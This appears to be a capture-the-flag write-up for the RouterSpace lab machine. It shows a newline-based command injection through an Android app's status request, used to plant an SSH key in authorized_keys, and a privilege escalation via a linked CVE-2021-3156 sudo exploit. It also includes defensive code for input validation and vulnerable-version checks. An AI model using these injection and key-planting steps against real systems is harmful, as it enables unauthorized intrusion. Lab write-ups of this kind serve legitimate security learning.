Hi guys, welcome to my blog. Today we are going to discuss an interesting machine, RouterSpace. This machine comes with an RCE vulnerability, and we escalate to root privileges through a vulnerable sudo version.
- Nmap scan
- Genymotion for APK testing
- RCE (Remote Code Execution)
- Getting the User shell
- Root Privilege Escalation
- Run linPEAS
- Sudo Version Vulnerability
- Getting the Root shell
Nmap scan
So first, let us start with an Nmap scan.
STEP 1: nmap -sC -sV 10.10.11.148
Analyzing this Nmap scan further, I found a normal SSH service.
Next we take a look at the website, which is http://10.10.11.148
Here you can see the download option in the top right corner.
Download that APK file.
Genymotion for APK testing
Next, we are going to set up Genymotion for APK testing. Instead of Genymotion, you can also use Anbox or Nox Player for this.
First I tested with Anbox, but it was not suitable for my Linux and threw lots of errors, so I used Genymotion, which I have used for a long time for testing Android applications.
Download the Genymotion using this link: https://genymotion.com
With that download the VirtualBox also: https://virtualbox.org
After downloading these, download any Android machine with an older version, 5.0 or 5.1.
If you try with a newer version, 9.1 or 10, it will not work; it throws a server error.
I was stuck at this stage for 2 days and got the idea from the Hack The Box forums.
From this, I have learned the lesson “Failure is not the opposite of success; it is part of success”, and I kept trying without losing hope in my searching. I say this for you guys: keep trying, and one day you will reach success.
Let us move on to the content.
After downloading the Android machine, use the adb command to install the APK on it.
STEP 2: adb install Routerspace.apk
Now the app is installed on your Android machine.
Next, we are going to set the proxy to intercept the requests using Burp Suite.
Open Burp Suite and go to the Proxy tab.
Here you can see the Options tab.
And the Add button, which is on the left.
First, it will ask you to enter the bind port; enter 4001 and choose your machine IP (tun0).
Then check the box (shown in the image below).
Next, we set the proxy for the Android machine using the command below (the value is host:port, so use your tun0 IP and the 4001 port you bound in Burp).
STEP 3: adb shell settings put global http_proxy <your-tun0-ip>:4001
Now turn off intercept in Burp Suite and click the Check Status button in your Android app.
Now it will say “Hey the router working fine”
Next we are going to intercept the request in Burp Suite.
Now you can see the hostname, which is routerspace.htb. Add the host to your /etc/hosts file.
Next, repeat the request, intercept it in Burp Suite, and send it to Repeater.
RCE
Analyzing further, I found that it was affected by remote code execution.
So first I tried “id”.
So let us try another way to bypass it: “\nid”
It worked; now we have found that the user is paul. I tried a lot further, but it was blocked due to the iptables rule.
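The reason the newline trick works is worth seeing in code. The snippet below is an added illustration written for this post, not RouterSpace's own backend (which the post never shows): a hypothetical "check router status" handler that blocks the obvious separators (`;`, `|`, `&`, backticks) but forgets that `sh` also treats a newline as a command separator, next to a hardened version that validates the input as an IP address and runs the command without a shell. The real command is replaced by `echo` so the demo is harmless, and the injected payload is a constructed `echo INJECTED` rather than `id`.

```python
"""Blocklist-based command filter vs. a real fix for command injection.

Hypothetical stand-in for a 'check status' endpoint, added for this
walkthrough; not RouterSpace's code. `echo` replaces the real command.
"""
import ipaddress
import subprocess

# Naive blocklist of 'obvious' shell metacharacters. Note what is missing:
# the newline, which /bin/sh treats exactly like ';'.
BLOCKED = [";", "|", "&", "`", "$(", ">", "<"]


def naive_filter_ok(user_input: str) -> bool:
    """Return True if none of the blocked substrings appear in the input."""
    return not any(bad in user_input for bad in BLOCKED)


def check_status_vulnerable(host: str) -> str:
    """VULNERABLE: string-concatenated command handed to `sh -c`.

    '1.1.1.1; id' is rejected by the blocklist, but '1.1.1.1\\nid' passes,
    and the shell runs the second line as a separate command.
    Returns the shell's stdout, or the string 'blocked'.
    """
    if not naive_filter_ok(host):
        return "blocked"
    # shell=True: /bin/sh parses the whole string, separators included.
    result = subprocess.run("echo checking " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def check_status_hardened(host: str) -> str:
    """SAFE: allowlist-validate the input, then execute without a shell.

    ipaddress.ip_address() raises ValueError for anything that is not a
    literal IPv4/IPv6 address, so no separator or whitespace survives.
    The argv-list form never invokes a shell, so even a metacharacter that
    did survive would be passed to the program as data, not parsed as syntax.
    """
    addr = ipaddress.ip_address(host)  # ValueError on '\nid', '1.1.1.1;id', ...
    result = subprocess.run(["echo", "checking", str(addr)],
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    good = "10.10.11.148"
    # Constructed sample input mirroring the '\nid' trick from the post.
    evil = "10.10.11.148\necho INJECTED"
    print("vulnerable, good input:", check_status_vulnerable(good).strip())
    print("vulnerable, evil input:", check_status_vulnerable(evil).strip())
    try:
        check_status_hardened(evil)
    except ValueError as err:
        print("hardened, evil input  : rejected ->", err)
    print("hardened, good input  :", check_status_hardened(good).strip())
```

The takeaway for a defender is that there is no complete blocklist for shell syntax; the fix is to validate against what the field is supposed to contain (here, an IP address) and to stop handing strings to a shell at all, which is also why the iptables egress rule on this box is a useful second layer rather than a substitute for the first.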
So let us check for an SSH key.
STEP 4: \nls -al /home/paul/.ssh
There is nothing available, so I generated an SSH key to get a login.
STEP 5: ssh-keygen
STEP 6: cd /root/.ssh
Now you can see the id_rsa.pub
STEP 7: cat id_rsa.pub
Copy that id_rsa.pub key.
STEP 8: \necho 'paste your key here' >> /home/paul/.ssh/authorized_keys
Now send this request.
Go back to your local machine; in the Nmap scan we found the SSH service, so let us log in through it.
Before that, set the permissions on your RSA key file.
STEP 9: chmod 600 id_rsa
STEP 10: ssh -i id_rsa paul@10.10.11.148
Now you get the user shell.
boooooooooooooooooooooooommmmmm!!!!!
You can see the user flag, which is user.txt
STEP 11: cat user.txt
Root Privilege Escalation
First, we are going to run the linPEAS script.
STEP 12: ./linpeas.sh
Analyzing this report further, I found that the installed sudo version was affected by a known vulnerability.
So now we are going to escalate privileges using this sudo version.
CVE-2021-3156
Link: https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py
Download this exploit onto the RouterSpace machine.
Run this exploit and you will get the root shell.
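For the defensive side of the same finding, here is a small added check, written for this post and not part of linPEAS or the original walkthrough, that takes the banner printed by `sudo --version` and decides whether the version string falls in the range the CVE-2021-3156 (Baron Samedit) advisory lists as affected: legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2. The `installed_sudo_version()` helper runs `sudo --version` on the current host; the sample banners at the bottom are constructed.

```python
"""Flag sudo versions in the CVE-2021-3156 affected range.

Added for this walkthrough; not part of linPEAS or the original post.
Affected per the advisory: 1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1.
"""
import re
import subprocess
from typing import Optional, Tuple

# Matches '1.8.31p2' or '1.9.5' (patch level 'pN' is optional).
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Inclusive bounds of the affected ranges, as (major, minor, micro, patch).
LEGACY_RANGE = ((1, 8, 2, 0), (1, 8, 31, 2))
STABLE_RANGE = ((1, 9, 0, 0), (1, 9, 5, 1))


def parse_sudo_version(text: str) -> Tuple[int, int, int, int]:
    """Extract the first sudo version in `text` as a sortable tuple.

    Accepts either a bare '1.8.31p2' or the full `sudo --version` banner
    ('Sudo version 1.8.31p2 ...'). A version with no 'pN' suffix gets
    patch level 0 so that 1.8.31 < 1.8.31p1 < 1.8.31p2 compare correctly.
    """
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no sudo version found in: {text!r}")
    major, minor, micro, patch = match.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def is_vulnerable_to_cve_2021_3156(version_text: str) -> bool:
    """True if the version string is inside either affected range."""
    version = parse_sudo_version(version_text)
    in_legacy = LEGACY_RANGE[0] <= version <= LEGACY_RANGE[1]
    in_stable = STABLE_RANGE[0] <= version <= STABLE_RANGE[1]
    return in_legacy or in_stable


def installed_sudo_version() -> Optional[str]:
    """Return the first line of `sudo --version` on this host, or None if sudo is absent."""
    try:
        proc = subprocess.run(["sudo", "--version"], capture_output=True,
                              text=True, check=True)
    except (FileNotFoundError, subprocess.CalledProcessError):
        return None
    return proc.stdout.splitlines()[0] if proc.stdout else None


if __name__ == "__main__":
    # Constructed sample banners; not output captured from the target.
    for banner in ("Sudo version 1.8.31p2", "Sudo version 1.9.5p2", "1.8.27"):
        state = "VULNERABLE" if is_vulnerable_to_cve_2021_3156(banner) else "not affected"
        print(f"{banner!r:30} -> {state}")
    local = installed_sudo_version()
    if local:
        print("this host:", local, "->",
              "VULNERABLE" if is_vulnerable_to_cve_2021_3156(local) else "not affected")
```

One caveat a version comparison cannot capture: distributions backport fixes without bumping the upstream version, so an Ubuntu or Debian sudo that reports 1.8.31 may already be patched. Treat a hit from this check as "verify with the vendor's package changelog", not as proof; the advisory's own behavioural test (`sudoedit -s /` answering with a `sudoedit:` error on a vulnerable build and with `usage:` on a fixed one) is the authoritative confirmation.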
Booooooooooooooooommmmmmmm!!!!
STEP 13: cd /root
STEP 14: cat root.txt
Now you can get the root flag.
I hope you understand this article; please support us.
OSCP Student: